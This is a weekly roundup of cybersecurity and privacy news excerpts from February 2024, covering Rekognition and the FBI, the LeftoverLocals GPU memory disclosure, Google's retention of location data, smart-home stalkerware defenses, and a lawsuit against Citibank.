Pete Recommends – Weekly highlights on cyber security issues, February 3, 2024

Subject: Amazon says DOJ disclosure doesn’t indicate violation of facial recognition moratorium
Source: FedScoop
https://fedscoop.com/amazon-response-doj-fbi-use-rekognition-software/

The statement came after FedScoop reporting noting that, according to the DOJ, the FBI is in the “initiation” phase of using Rekognition.

In an emailed response to FedScoop, Amazon spokesperson Duncan Neasham said: “We imposed a moratorium on police departments’ use of Amazon Rekognition’s face comparison feature in connection with criminal investigations in June 2020, and to suggest we have relaxed this moratorium is false. Rekognition is an image and video analysis service that has many non-facial analysis and comparison features. Nothing in the Department of Justice’s disclosure indicates the FBI is violating the moratorium in any way.”

According to Amazon’s terms of service, the company placed a moratorium on the “use of Amazon Rekognition’s face comparison feature by police departments in connection with criminal investigations. This moratorium does not apply to use of Amazon Rekognition’s face comparison feature to help identify or locate missing persons.”

Filed: https://fedscoop.com/category/ai/

RSS: https://fedscoop.com/category/ai/feed/


Subject: LeftoverLocals: Listening to LLM responses through leaked GPU local memory
Source: Trail of Bits Blog via Sabrina
https://blog.trailofbits.com/2024/01/16/leftoverlocals-listening-to-llm-responses-through-leaked-gpu-local-memory/

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries, as shown below:

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details:

Exploit brief – GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had any significant consequences on applications. Historically, this entailed that GPU hardware and software stacks iterated rapidly, with frequent major architecture and programming model changes. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA simply provides a few short tables. This type of vague specification has led to alarming issues, both previously and currently, as LeftoverLocals exemplifies.

Posted in

Machine Learning

Vulnerability Disclosure

RSS for blog: https://blog.trailofbits.com/feed/


Subject: Google is Still Failing to Protect Privacy of Abortion Seekers
Source: Accountable Tech
https://accountabletech.org/statements/new-research-google-is-still-failing-to-protect-privacy-of-abortion-seekers/

Data gathered by Accountable Tech in 7 states found that Google still collects and retains Location History data for visits to abortion clinics despite promising 18 months ago to “delete these entries”Accountable Tech published new research today showing Google’s continued failure to delete users’ sensitive location data despite a July 2022 commitment to protect the privacy of abortion seekers after the fall of Roe v. Wade. On the heels of Google’s latest announcement that they will soon store Location History data on individual devices and encrypt cloud backups, this report makes it clear that Google cannot be trusted to follow through on its privacy promises.

In the eight experiments Accountable Tech ran across seven states, Google retained Location History data about 50% of the time. While an improvement from our initial research, a person seeking abortion would have the same odds as a coin flip to determine whether their location data might still be retained by Google and used to prosecute them…


Subject: How to lock out your ex-partner from your smart home
Source:  Malwarebytes
https://www.malwarebytes.com/blog/news/2024/01/how-to-lock-out-your-ex-partner-from-your-smart-home

[infomercial … ] Stalkers can use all kinds of apps, gadgets, devices, and phones to spy on their targets, which are often their ex-partners. Unfortunately, while they no doubt have many positive uses, smart home devices give stalkers an array of tools to keep an eye on their targets.If you are the partner that stays in the house you shared together, you need to make sure that you lock out your ex-partner. This may seem unnecessarily painful at first, but it’s better to be safe than sorry. Your ex doesn’t need to be a hacker when he still has access.Consider the apps you have shared from your phone. Some of these apps can be queried for information about where, when, and with which device they were last accessed. If you want to keep those apps, make sure you have full control and nobody else has access.Any camera in your house surely stores more footage about you and your family than of any burglar and this footage is usually stored in the cloud. That means it can be viewed by anyone who has correct login credentials. And, when most people think of security cameras and baby monitors, they will ignore less obvious smart appliances.

A smart doorbell can give away who comes to visit you and when. The setting of your smart thermostat can reveal whether you are at home, in your bed, or if you went out for a while. Even smart lighting systems may give away information about your location inside the house or whether you’ve gone out. Your ex will know some of your habits and can use that to interpret the information provided by smart appliances.

Other smart appliances that may reveal information about you or your whereabouts include your TV, coffee maker, oven, refrigerator, and cleaning robot. Someone could also use these smart appliances to make your life miserable. They may be able to remotely turn up the heat, flash your lights, defrost your refrigerator, set a timer for your oven, and so on.

How to lock out your ex-partner from your smart home…


Subject: Citibank fails to protect customers from fraud, N.Y. AG’s lawsuit contends
Source: UPI.com
https://www.upi.com/Top_News/US/2024/01/30/new-york-attorney-general-sues-citibank-for-failure-to-protect-customers/2971706635781/

Jan. 30 (UPI) — New York Attorney General Letitia James filed suit Tuesday against Citibank for allegedly failing to protect and reimburse customers from fraud. “The lawsuit alleges that Citi does not implement strong online protections to stop unauthorized account takeovers, misleads account holders about their rights after their accounts are hacked and funds are stolen, and illegally denies reimbursement to victims of fraud,” James said in press release Tuesday.

In a statement Tuesday, Citibank suggested certain kinds of fraud are beyond their control.

“Banks are not required to make customers whole when those customers follow criminals’ instructions and banks can see no indication the customers are being deceived,” Citibank said in statement Tuesday, according to CNBC.

Posted in: AI, Cybersecurity, Healthcare, Privacy, Search Engines